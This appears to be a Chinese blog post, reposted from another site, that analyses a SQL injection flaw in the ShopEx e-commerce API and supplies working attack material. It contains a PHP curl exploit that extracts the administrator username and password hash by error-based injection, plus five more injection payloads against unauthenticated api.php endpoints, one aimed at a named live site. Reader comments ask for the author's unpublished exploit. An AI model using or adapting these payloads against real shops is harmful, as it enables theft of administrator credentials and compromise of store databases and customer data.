正在阅读:

shopex最新版API注入漏洞分析附利用exp

11,239

缺陷文件:

\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php

core\api\payment\1.0\api_b2b_2_0_payment_cfg.php

第44行 $data['columns'] 未做过滤导致注入

exp:

<?php
 
set_time_limit(0);
ob_flush();
echo 'Test: http://localhost:808' . "\r\n";
$sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select 
(select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables
 group by x)a)#&disabled=1';
$url = 'http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0';
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $sql);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
flush();
$data = curl_exec($ch);
echo $data;
curl_close($ch); 
 
?>

外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.

注射1:

http://www.waitalone.cn/api.php POST

act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#

注射2:

http://www.waitalone.cn/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}

注射3:

http://www.waitalone.cn/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx

注射4:

http://www.waitalone.cn/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1

注射5:

http://www.waitalone.cn/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx

自己整的一个exp,利用curl来提交数据包,所以要求你的电脑需要支持curl,大家可以利用上面的exp自己改改。

shopex_api注入

转自:http://www.lpboke.com/shopex%E6%9C%80%E6%96%B0%E7%89%88%E7%9A%84api%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E9%99%84%E5%88%A9%E7%94%A8exp.html

目前有:2条访客评论,博主回复2

  1. xiao
    2013-08-14 10:41

    那exp能共享不?

    • 独自等待
      2013-08-15 10:33

      @xiao:上面已经有exp了,我写的这个暂不公布,过段时间吧,等漏洞修复了再。

  2. 请教
    2016-08-09 22:23

    您好,我扫描到一个漏洞,您的EXP现在可以发了吗~~~~(>_<)~~~~

    • 独自等待
      2016-08-11 16:58

      因为乌云的事,最近博客不再更新exp之类的东西。

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌